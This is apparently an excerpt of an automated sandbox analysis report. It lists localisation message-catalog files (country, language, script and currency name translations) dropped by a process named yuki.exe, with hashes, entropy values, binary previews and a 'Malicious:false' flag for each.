                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!.......%......./...........7...:...R...................................#.......-.......!...$.......F.......e.......u...........................*...................................!...)...2...1...\........... ...............&.......4.........../........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_4217 'Z\303\272\304\215tovac\303\255 jednotka Africk\303\251 rozvojov\303\251 banky'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9477
                                                                                                    Entropy (8bit):5.108213300568377
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zPe0bblojNYw1aSKdFGyNi4QTNbtKMJtpkS2SILC3KmSWKwF5jkmSXEjKUnakSXf:zPnbOKaaSMFPqPK0vMLC/fF5IRUdU
                                                                                                    MD5:0B3B9DF4B4E95B7DDC4CA9E0E1D2F944
                                                                                                    SHA1:59D7D9EE40D56576E7187A1A917421D20CC1A1A5
                                                                                                    SHA-256:C70C7F049AA39B3AFF9A6CD88D1E56B7983749B58E024E2B5287351DC35B4D99
                                                                                                    SHA-512:C6C8189476DDAE146B1AF313A074D54A91114C32FFFC4C88343EA68B115A18DAA2C0E14546DC0071548F7E6FDCBA86E28CB6193C431DB13B719422523806FA6D
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................)...............5.......E.......V.......d.......u...1.......3.......9.......7...........W.......f.......t...................................................................0.........../.......>.......M.......].......n.......z...............................................................................................................-.......2.......I.......U.......\.......g.......w.......|.......................................................................................................$.......)...............<.......C.......H.......P.......U.......d.......h.......p.......v.......................................................................................................%.......+.......:.......I.......g.......z.......................................................................................................*.......3.......B.......G.......S.......[.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 335 messages, Project-Id-Version: iso_639-3 'abchazaj\305\241tina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14412
                                                                                                    Entropy (8bit):4.78873839494385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:C8qYCE+3AvUr990Iombx1a1lcQfFMrsatBmTpwH6LgH35iUmWk:CjEdq92GbfaNXgz3Q1
                                                                                                    MD5:4FABF2CC27B7CAB827CF3E28DC60F25C
                                                                                                    SHA1:9EC1C47D5B8AAF7D939D8FB150C9EAD20C57AC3F
                                                                                                    SHA-256:4B36598766764062826F1B2894088349A50097AB7BDE3EBA1C690B6E2ED38E97
                                                                                                    SHA-512:5C10F52BCE38925F7591DCB2C3A11C2E620F53E4C4F12187AD41A0AD2FD5377C15E87446D111D12BF66657674E863251C00BBF647A74E131A5F31D53BA607E3D
                                                                                                    Malicious:false
                                                                                                    Preview:........O...............................................$.......*.......2.......7.......@.......J.......O.......X.......a.......g.......o.......v.......}............................................................................................................................................................... .......(.......0.......5.......<.......E.......O.......V.......^.......d.......l.......t.......}.......................................................................................................................................................%.......,.......3.......:.......C.......I.......P.......V.......\.......b.......k.......p...............................................................................................................................................................................$.......-.......4.......?.......E.......O.......V.......\.......u...............................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'afro-asijsk\303\251 jazyky'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3971
                                                                                                    Entropy (8bit):4.947647064935191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhq7n4SYzbOifIOYiayDu3KK0UL30ULf+qadXQvhr/CUJhdLyiaiJn2a0zc4:0WMIn4lSiw9R0E0C+fIC0hdz32SpEb0W
                                                                                                    MD5:0BCF1D6F04A890C4E84C7E8613BB5061
                                                                                                    SHA1:9D42C2654E47CFD871C49BBB7E70F3A58B63366D
                                                                                                    SHA-256:52CD5DB64C465BF159222BB369E16026D8A1537DE2FB12227AA958472C022A59
                                                                                                    SHA-512:294D3D7C18E461661EDF93EB6744F4A13D7D132A6CC53307160DEE273AA3865CC3C895ACE682D40D28204D09825EEE763B213AE65360E8F00526C666EC92DF16
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................9...........................".......3.......D.......S.......j.......}...................................................................$...!.......F.......V...7...r...............................................................+.......=.......P.......a.......t..................................................................."...........B.......T.......e.......x...............................................................................+.......?.......O.......[.......m.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 94 messages, Project-Id-Version: iso_3166-1 'Afganist\303\263n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4448
                                                                                                    Entropy (8bit):4.918089101393498
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jVgr4t+/ibPEKIf1QzygPjYhDoAu1Cy7L8X1wHjLuWW80Jt:ht+/iIBQrPGDoAiVHjLD07
                                                                                                    MD5:2DD36D1B83285DBC46F11A82A5D4BE8E
                                                                                                    SHA1:555862EFA111E54A08E9475B4B1A8530C899CD2A
                                                                                                    SHA-256:3BA545C0D8E22013BA276710D931EAEA7B03457D0DAE3FF61D8723208C291DE4
                                                                                                    SHA-512:67AC88F455B7979C92FC39332134EF33F034BC75B047F7132F476906D4D3847AAD4C63E8C3D2E7ACC71C88D0C7B6D630F16373954615DD28FD9A5FA22C38A612
                                                                                                    Malicious:false
                                                                                                    Preview:........^.......................................................................'......./.......:.......B.......M.......U.......].......d.......{...............................................................................................................................................................................'...............4.......:.......A.......L.......S.......^.......e.......m.......u....................................................................................................................................................... .......).......D.......P.......W.......`.......f.......n.......y...............................................................................................................................................5.......@.......H.......N.......a.......m.......x...............................................................................................................!.......(...............:.......@.......S.......].......c.......l.......w.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 178 messages, Project-Id-Version: iso_15924 '\320\220\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10986
                                                                                                    Entropy (8bit):5.345365190245807
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Vzm1ustf9EElKtU4WjV3a5hW8KxLS6VHVryu97:J43rB4WjV3a5hW8Kxl5y0
                                                                                                    MD5:D21BB77869863C307F19DA2881E86E44
                                                                                                    SHA1:078B1F56246262C8D37DD33B48AC0EB6207235CA
                                                                                                    SHA-256:9ADDE0E5667AA6B7DBEB8F96A3A20661B8640DEB4A9F02AEEE11D34000A1D909
                                                                                                    SHA-512:7CBFC1D14C6E69BDA4DCE20B9A676567E136EE1E5209150592A8300273B969645562B1D9DF183EBB343AE620041BB14B3F5ED941E6C9894C071BAC14F7D55167
                                                                                                    Malicious:false
                                                                                                    Preview:........................<...................................?...........T.......[.......u.......~.......................................................................................................................................................&.......,.......F.......M.......h.......p...&...y...................(...................................&...............@.......U.......`.......g.......o.......u.......~...........................,...................................5.......<.......E.......V.......g.......}...&...............4...................(.......0.......7.......?.......H.......Q.......\.......p...........................#...........................................................$.......;.......@.......O.......U.......^.......g.......u.......z...............................................................................................&.......;.......J.......X...(...b...................................-...............!..........................."...#...(.......L..."...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 202 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10906
                                                                                                    Entropy (8bit):5.083495892834184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:GKGhK5w/V++Bap/te8zJ2kTD06/WgJ8kuyheKjRaxGfgKE/fpF2krWyJw3tMW4b6:GzhK5wBw/e8zJR/P/WgJ8kuieKs8gXXK
                                                                                                    MD5:7D39E68537B00DE0D1D6827F85A7CB43
                                                                                                    SHA1:790B889649073F54DB47D1B0039FD5D0BEF7244E
                                                                                                    SHA-256:C79CB6AB4569B2969B4802F54F347FB7F39A39F8B7D7AB4B757E39FDE23F286C
                                                                                                    SHA-512:ABD0BC4512EC59DC154D46177BDFFF803DF498836D5100EFFF203AC27C313CB965AFC4CC2C55E67B9EF66027AA0334A2E0B762E27E929297990B073FC33674CA
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............................................................$.......+.......?.......I.......Q.......W.......a.......i.......t.......|......................................................................................................................./.......8.......E.......M.......V......._.......f.......u...............................................................................................................................................1.......9.......B.......P.......o.......t.......|...............................................................................................................................................................%.......+.......5.......:.......B.......b.......i.......o.......w.......}.......................................................................................................................................................!.......'.......2.......=.......G.......O.......V.......^.......e.......n.......y...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 79 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3619
                                                                                                    Entropy (8bit):4.814355331444809
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:k/+QuibxnCRAdukmiJbq/HlxHUJpAhYJb3S:6dxnCzkrbq/F+Jb3S
                                                                                                    MD5:A663CE16CA7C6E59813F6FE70802ADA0
                                                                                                    SHA1:233D174094C4F692DED53D285D84434FC2BF79DE
                                                                                                    SHA-256:B310427FA554D4880227E2BD39DC110480B59047B16442ADDB735428E5026693
                                                                                                    SHA-512:71DAE1207BA1DE339F9119736C91376D9B56B8C492696DAD35D771B97DF836680E2AF0FD48EC0EDA1B035995895AD5963E96E2784AF50C198DB039D799E10DAC
                                                                                                    Malicious:false
                                                                                                    Preview:........O...........k...................................................................................................................................$.......-.......A.......H.......N.......W.......q...................................................................................................................................................................(...%.......N.......W......._.......q.......{....................................................................................................................................... .......).......0.......9.......X.......^.......e.......l.......t.......{...............................................................................................................................................................................................%.......+.......4.......N.......W.......^.......g.......o.......v.......~.......................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23789
                                                                                                    Entropy (8bit):4.99548909062309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosMrrf7Z9WaBct46nbjz5wsWP48WAINiZGh+S8c5+szTECyAg/qKIm1IA:0ojD7ZIaBct48fmsWP48WAITZ+wxyAgv
                                                                                                    MD5:F3C7DCFCFE760847019CF002AF73E547
                                                                                                    SHA1:6F22D2E6CA3497BFE1AE890D6FB8104420077D67
                                                                                                    SHA-256:6D972F0CE5692F2EBDDDCB1DCC96BD114E923BABC38BEA9CB935820CD77314CE
                                                                                                    SHA-512:687668D2F4E67C948DB87817AA7E211AE9C5BAA6ECFBDC0FF59F352AC4094169DD6AD060F5EBE057A222AF432EAB1EF46944618C2F58AEC4D32E6C0B70FFBA31
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 828 messages, Project-Id-Version: iso_3166-2 'Abidjan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34985
                                                                                                    Entropy (8bit):4.927418963960025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:/87DI/6+O4ewh/GCIylRqDese7sKNubzJzJr8sFV4yMlpV9A2:07gO4PuylRqDesGsKGx58sFVQn62
                                                                                                    MD5:9F8E4051F4E11E0A515D16870D9C5B68
                                                                                                    SHA1:B9651D08EFF81D31A20FDAD11DA2A9CEEACBC0EE
                                                                                                    SHA-256:61070703000E13B774CBA2946198AC9F73489FCA03B72D9595D6EE9E3E7581EA
                                                                                                    SHA-512:44CD3CC1CF2B35AAC38FDD3E4562DAD09B1C2F56C5C3DAFA047EE17EFA3AC9649E87FDCE2111D101C5F054AAEE20698359601027FFB977BF58E910D23B080B28
                                                                                                    Malicious:false
                                                                                                    Preview:........<...........U....3......0E......1E......9E......BE......NE......VE......[E......dE......pE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F......!F......-F......4F......;F......CF..$...LF......qF......yF.......F.......F.......F.......F.......F.......F.......F.......F.......F.......F.......F.......G.......G.......G.......G......&G....../G......8G......>G......DG......MG......SG......YG......]G......oG......yG.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......G.......H.......H.......H......"H......)H......3H......9H......DH......KH......SH......^H......cH......oH......yH.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......H.......I.......I......#I......0I......<I..$...BI......gI......yI.......I.......I.......I.......I.......I.......I.......I.......I.......I.......I.......J.......J......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Tiriogaeth Antarctig Prydain'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2876
                                                                                                    Entropy (8bit):5.2085235263475935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3s/el2RNxH55+vGqIfdvqN5CoURICfz1g3ChXhuv6qNSGHAhP8EPBFjxw:rLvO5+yaCoOIUxhuigJEm
                                                                                                    MD5:B5B939C2556755389D3F19C9DAF66B54
                                                                                                    SHA1:6CA7C24B1D260516871559BA1BF110EFBA7C3B4A
                                                                                                    SHA-256:035A5C3493ACD3093C728FAFD72446FE517A8BE8FEFC4C8BD234A2F3C0C8FF2A
                                                                                                    SHA-512:8A576911D8835DC6D497F6F833EF02F65DC6DE6AC153FB0448550AF88D623280611505053028D0B062F96D2AA42B87B09EF9CFC3E7B6344DB786DB434A2C4DAE
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................#.......,...7.......d...3...............................................$.......#.../.......S.......m.......{...........................1..................................."...$......./...S...........!...............2.......-...........)........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 35 messages, Project-Id-Version: iso_4217 'Manat Aserbaijan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1790
                                                                                                    Entropy (8bit):4.848397119905576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:f/D8Nl0RARRbnb0ewAxsgqKmUQc+Cf2UU:f7830RARNnb0/m5mzc+U2f
                                                                                                    MD5:CC5B08F4A55062A71CB830D5C8F5E82D
                                                                                                    SHA1:FDA033FEEEA3EACCDBBED653E33224A7976635D1
                                                                                                    SHA-256:43F5C003DC2E29E4E321F0357D3C91B379533DD05BC3FA9FDFC1D179892F967F
                                                                                                    SHA-512:E276DC6D31CA640C52D707A7A200D14729F57D0A80698FCDBE4F4207D3EC21BC7EB5847DF9BB5D58CD6CE5BB92D9ABE9185FB7383C98ACBF0A73263ADBD7FC5A
                                                                                                    Malicious:false
                                                                                                    Preview:........#.......4.../...L.......................................&.......5.......;.......A.......F.......K.......S.......[.......`.......e.......i.......o.......y.......~...............................................................................................................................................................................&.......2.......8.......>.......C.......G.......O.......W.......\.......a.......e.......k.......u.......z...................................................................................................................................................................................#...........!............................... ......................................."................................................................Azerbaijan Manat.Baht.Balboa.Brazilian Real.Denar.Dobra.Dong.Gold.Guarani.Hryvnia.Kina.Kyat.Lek.Leone.Lilangeni.Loti.Naira.Ouguiya.Palladium.Pataca.Peso Uruguayo.Platinum.Pula.Rand.Silver.Sol.Somoni.Tala.Tenge.Tugrik.Unidad
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 371 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14506
                                                                                                    Entropy (8bit):4.629214974014564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:se7rRjWVXP9/k2vTGwXDVYrIhWdjUnzVmz3Gzs3wAeB3Rl:d7rWJz0DP349Rl
                                                                                                    MD5:33674312445DA079EB817D1726BA0DBE
                                                                                                    SHA1:63FF041185133D56111D20E47BF7CC2BAA0C47C7
                                                                                                    SHA-256:37424C5CDF57DB2E6801CDC5A69C05FF67A3A790DD00E3A7B1B3EDD8245A6A2B
                                                                                                    SHA-512:8A1F976DF13C4C7DAB9A575769BDEFF1F3D12A38CC4331DDB491C25B187C3B64F23533AE888C88AE88FF9896AC4E621D9B46F441AA0FCF1DB4FBCEE4E46F2D9A
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................".......'.......,.......3.......9.......E.......M.......R.......X.......e.......l.......v........................................................................................................................................................ ....... ....... ....... ....... ......! ....../ ......7 ......= ......D ......K ......P ......T ......Z ......_ ......f ......o ......y ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!.......!......"!......(!.......!......4!......<!......@!......E!......M!......U!......[!......`!......h!......r!......x!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......%"......."......6"......;"......B"......K"......Q"......Y"......_"......h"......t"......|"......."......."......."......."......."......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_639-5 'Ieithoedd Affro-Asiaidd'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2109
                                                                                                    Entropy (8bit):5.061040030128704
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:XSNPUclJuEcGbhFiEZCUgCCfpxZQrVOhBcotZsSY:XZcAG+uCPCU3ZQ8sSY
                                                                                                    MD5:4A49EF7F6C499201AEA8054F71060876
                                                                                                    SHA1:E89CE52604FA8E4DC5F66AAD6BCF5887D3BB7F56
                                                                                                    SHA-256:5763B0F3B3176F607ECB88825560993DF5E78F727F3496CDD3922F0A8420EE6D
                                                                                                    SHA-512:953485BF74EE98D179BC295BEDC1F4A707659AACC1305FDF7C673D9BEAED0CA2A45FC31D32BB3397CEBB3D305F4C055E996A0526A2CAFBB1DA33197F2A01DC41
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......x.......................................................................#.......3.......C.......T.......e.......y...!...................................................................&.......7.......F.......O.......g.......~.......................................................................%.......5.......F.......W.......l...............................................................................)........................................................................................................................................................Afro-Asiatic languages.Algonquian languages.Apache languages.Armenian (family).Artificial languages.Athapascan languages.Australian languages.Baltic languages.Bamileke languages.Banda languages.Basque (family).Batak languages.Berber languages.Bihari languages.Caucasian languages.Celtic languages.Central American Indian languages.Germanic languages.Greek languages.Ijo languages.Indo-Europe
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10182
                                                                                                    Entropy (8bit):4.979968945733408
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHHcY56DxCB1EXltU4WjV9qWxa5hW85jxZHwursjp2DC26v:5cYsFCXmg4WjVDxa5hW85jxZ/Qjp2w
                                                                                                    MD5:DA646603AEE0A76B2A683B7172CD9918
                                                                                                    SHA1:1B019DF9255FB22963F25BE722BB80EABE066E3A
                                                                                                    SHA-256:36386AD45E99BC8BDDA51DB1CB7B101A3BD89E8A6AE1598562A02C1E1B74C856
                                                                                                    SHA-512:254F49BF282EF5BAA9A6D2E75BD5BD78A881DBC304D8CC8BBBD59E169430F69071C70D08FAD251968D6A6DEFF9EF4712D6FD0295610FE6CDE92D8EF40535AD78
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23328
                                                                                                    Entropy (8bit):5.018273806970824
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DaPyE7e5w9OJK/Ubjh5wsWP4XdAIzirGIdK0c6wzyAoxW:jhZet7ei9O4ItmsWP4XdAIKKD6wzyAow
                                                                                                    MD5:5E2B60EC8A14BCCF69E824DC4586817B
                                                                                                    SHA1:2E87452C2810CE9DB7A3BE761413B97162BD394D
                                                                                                    SHA-256:B066043BA0D4C1E3A75C4BA3313BDA0D125F2BD0C46F68BC106FA47929297ADC
                                                                                                    SHA-512:C57DE1734B8B8F40E9B06EF881820562A55AF0C9A8C3A8E7A5D84B18623F8BA5D4D4720CA2474200DBC8DE81813C8AE1B3E0D84D094370875066A7A5D8844456
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3200 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):134479
                                                                                                    Entropy (8bit):5.204971419194627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:51pl1ysUdlvE99kiyGpeNT2OsDYdBQe4rQVhtsPNh9EbOQY:78sOE9uYpRGBQD5PNIO
                                                                                                    MD5:07CC70236A0CF4F6B9DD65907869ECF9
                                                                                                    SHA1:C09B6D24F5A8288990C46D3385D3252F6DDAF6F9
                                                                                                    SHA-256:798EB4B9439DDF59AB8D0E32C6A894455E65509F70EDE06A7EB5A35C94CA590B
                                                                                                    SHA-512:7C23B30CCC1702ECC82F74A950559B8B684A4DD3C036EED8214BF6E656C62FE03D14D6DE61F90AC578407DD127A820BFD43F59E33730379FD91369B212DCDC25
                                                                                                    Malicious:false
                                                                                                    Preview:.................d..............................................................................................".......*.......3.......8.......@.......E.......T.......].......c.......l.......r.......|..............................................................................................................................................."......./.......5.......;.......C.......M.......Y.......i.......t.......................................................................................................$...............8.......B.......J.......T.......a.......k.......z...............................................................................................................................$.......0.......6.......A.......I.......P.......W.......`.......p.......................................................................................................................................".......>.......M.......U.......f.......r.......y...............................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britisk Antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2671
                                                                                                    Entropy (8bit):5.1908209924976605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADl16aZvGqIfdvqNuoUBW79MhWzy6BBSchZIVRBIVve:qDNZyBoQWGAzsVIV2
                                                                                                    MD5:040E3165DB8298EF8743A97A5DBFEA3D
                                                                                                    SHA1:68D5236438F7600CD1528B834AD0A3D112648A9A
                                                                                                    SHA-256:BA3AC60995093A39E16528D817BCDCB86F092E106D376F3992D423A9194B0BCB
                                                                                                    SHA-512:DE7DABB4FD80EDEADB19AEB67BAC23B4D97B83B22DFFFD3E4157E535A4657FAB6DE8BDD5A70371BAF93927F562110AE2F305FBA264ACA9D1D9A257C8F5C44CC5
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................{...&....... ...............<...........-.......5.......H.......R.......p...-...........................................................(...&...6.......].......n...................&.......0..............."...........*...%...6.......\........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'ADB-regningsenhed'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8861
                                                                                                    Entropy (8bit):4.94409603520824
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmK6T5B3rbJ5CdgjCnMLCkhSCHzycTHC2o:TIDmKQHb/Cdgmn2DICuGo
                                                                                                    MD5:20BCDEA65E82CABB809842B88BE2A2E4
                                                                                                    SHA1:236CA718D43396C0BFCDC0DA765503CF67B492D0
                                                                                                    SHA-256:B08514E6C11FF3DFADAD340083112A4F9EB6C4F8B9CF4DE1515A912D5CCECFDA
                                                                                                    SHA-512:BD121ED5671A7429D8119E9DD3DF27130294754D73FF4B5A73BEB7F63D5B8CF884BEFF46EE950562E11C7F2D27F1BAC65898B9915E7A4612D7D6A5ED4226E615
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 434 messages, Project-Id-Version: iso_639-3 'Abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19729
                                                                                                    Entropy (8bit):4.844412180043196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:h/pLczZjktHeMvNiuDNGKYGrEchMLy7sFMo4xQ5nhYUsPLxNdH6x8TKTxsFzDv:7L26tNyGrXM6I7hYUmFNdHSaFn
                                                                                                    MD5:0D48230072A95B2A8623F1A43E62EF46
                                                                                                    SHA1:54D659745E17406E323AE4C359933EC02BCC265E
                                                                                                    SHA-256:6A95B8FC67019CA231035813943E3B08A22744B8A81D9E419EEF20AAC0986ECB
                                                                                                    SHA-512:8C3259C2055092562554A6436726DF633A2E8223037EE993CB929A3CCA9E1128D178118AEAC49FCCC0E67DF73D364AF35F77653F923BB3D84FA2D079A01A9D8E
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...<.......h$......i$......s$......|$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%......&%......>%......G%......^%..#...g%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&.......&......'&......>&......F&......K&......c&......j&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'......"'......8'......G'......Q'......Y'......a'......r'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......#(......,(......2(......9(......>(......D(......J(......^(......d(......m(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......)......-)......1)......8)......>)......F)......M)......U)......k)......o)......v).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'afroasiatiske sprog'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3961
                                                                                                    Entropy (8bit):4.809002785236461
                                                                                                    Encrypted:false
